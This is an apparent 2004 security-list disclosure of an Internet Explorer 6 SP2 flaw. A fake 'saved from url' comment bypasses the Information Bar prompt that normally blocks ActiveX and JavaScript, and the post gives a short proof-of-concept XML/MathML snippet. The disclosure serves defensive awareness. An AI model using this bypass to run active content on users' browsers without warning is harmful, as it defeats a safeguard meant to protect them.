XP SP2 IE6 vulnerability

From: CnS (cns_at_free.fr)
Date: 09/16/04

Date: 15 Sep 2004 15:46:57 -0700

Background information

Windows XP Service Pack 2 has introduced new features that improve browsing
security in Internet Explorer. Most of them are additional messages that force
the user to validate everything that is done by the browser. Most of these
messages are displayed in the new Information Bar. For example if you try to
open a web page that contains Javascript code or ActiveX objects, it is likely
that they will be blocked, the Information Bar will appear and offer you to
reload the page with the untrustworthy components enabled.

More information can be found at:

The side effect of these features is that some web sites can't be used as
easily as before because the user has to respond to an increasing number
of notifications and questions.

Vulnerability Explained

As an example I created a simple XHTML document containing MathML and installed
the MathPlayer ActiveX plugin from DesignScience (http://www.dessci.com/en).
This type of document used to render correctly in IE6 but since SP2 was
installed the new features interfere with the loading of the component : the
page is first loaded without MathPlayer which has to be enabled via the
Information Bar.

But there seems to be a vulnerability in Internet Explorer that allows this
protection to be bypassed. All that needs to be done is to add a fake comment
between the DOCTYPE declaration and the <html> tag that mimics those added by
IE when a page is saved to disk. The "fake" comments must be formatted as
follows :

<!-- saved from usr=(XXXX)URL -->

where URL is to be replaced by an URL (for instance http://www.example.com/)
and XXXX by a 4 digit integer that represents the number of characters in
the URL (for instance 0023).

System Affected

Windows XP Pro and Home editions with SP2
IE 6.0 (SP2)

How to reproduce

Install the plugin from DesignScience. Paste the
following text in a file with an .xml extension. Open it with IE with and
without the comment on line 4.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0//EN"
<!-- saved from url=(0023)http://www.example.com/ -->
<html xmlns="http://www.w3.org/1999/xhtml">
<TITLE>IE Vulnerability example</TITLE>
<math displaystyle="true" xmlns="&mathml;">


This also works with pages containing Javascript code.